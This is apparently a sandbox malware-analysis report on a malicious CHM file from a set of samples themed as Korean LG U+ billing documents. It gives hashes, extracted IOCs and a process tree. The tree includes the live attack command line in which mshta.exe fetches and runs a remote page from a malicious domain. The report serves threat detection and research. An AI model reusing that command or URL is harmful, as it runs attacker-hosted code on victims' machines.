Overview
overview
10Static
static
8LG유플....html
windows7-x64
1LG유플....html
windows10-2004-x64
1LG유플...ml.lnk
windows7-x64
10LG유플...ml.lnk
windows10-2004-x64
10MAIL_20230...02.chm
windows7-x64
10MAIL_20230...02.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
21-03-2023 23:32
Behavioral task
behavioral1
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
MAIL_20230125151802.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
MAIL_20230125151802.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral7
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
Message.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
Message.chm
Resource
win10v2004-20230220-en
General
-
Target
Message.chm
-
Size
23KB
-
MD5
a2a8094933150e18fb31f24b5e20643b
-
SHA1
e4a2958358b33ad814828efeaa6295eb46510599
-
SHA256
c529b6e0b012d8246f9f2720f72253d8d52a1a58f2ee3db32128b2a96c813b9a
-
SHA512
24b43e8452d0b0fc76cb60e6c99e2537c7038ab6808f48ce1578733f1b39e53cffd2a437338ecbcec43944b6331a08657918cb6cfdbaa89db6c2e85ebdf0a6c9
-
SSDEEP
384:2yOvnvzjch5duuyTvBLalWcOrFETyshkB+6tBUMk0zpU:2yOvnbwhv+v1rc4FE+shq+67ZpU
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/7.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 7 520 mshta.exe -
Processes:
hh.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main hh.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
AUDIODG.EXEhh.exedescription pid process Token: 33 1456 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1456 AUDIODG.EXE Token: 33 1456 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1456 AUDIODG.EXE Token: SeRestorePrivilege 1292 hh.exe Token: SeRestorePrivilege 1292 hh.exe Token: SeRestorePrivilege 1292 hh.exe Token: SeRestorePrivilege 1292 hh.exe Token: SeRestorePrivilege 1292 hh.exe Token: SeRestorePrivilege 1292 hh.exe Token: SeRestorePrivilege 1292 hh.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1292 hh.exe 1292 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 1292 wrote to memory of 520 1292 hh.exe mshta.exe PID 1292 wrote to memory of 520 1292 hh.exe mshta.exe PID 1292 wrote to memory of 520 1292 hh.exe mshta.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/7.html ,2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x57c1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\INISAFEMailv4[1].cabFilesize
2.2MB
MD58abb4e13ee3f94df4b5e276ef6cb0144
SHA1819db68fcd5a8673383c82898b729f16b77054d2
SHA256c0eee87ea1144be28d12e5af7a3307c6a690029bef1e7b43ca08aa8fde0f2c61
SHA512f9bbb330cf5615cefed666c84010b685feb4f8cc7e36c1044e57a22b2a5fc7bd4a922157bc9acdfe49629d7bff0eaec6cfd336a2732a25cb895c574a2c2ea930
-
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\INISAFEMailv4.infFilesize
538B
MD510418288c546673054c4bd83220ffeef
SHA1b179588f320e234899a101ecd651bd024569d8bc
SHA256eff48ef0b99ff404fed484df294d18018c5be12fcc7d2d778c18fd0d01c07971
SHA512a96a226821148090c1de744552a3d26c858070cb4ee60c508bf29ef9ff302a85bcfd23c7fbd10c8f9c5871e43f6ff1919e2a9e08c05e7c6127943b485ba6b160
-
C:\Users\Admin\AppData\Local\Temp\Tar4E0A.tmpFilesize
161KB
MD5be2bec6e8c5653136d3e72fe53c98aa3
SHA1a8182d6db17c14671c3d5766c72e58d87c0810de
SHA2561919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd
SHA5120d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff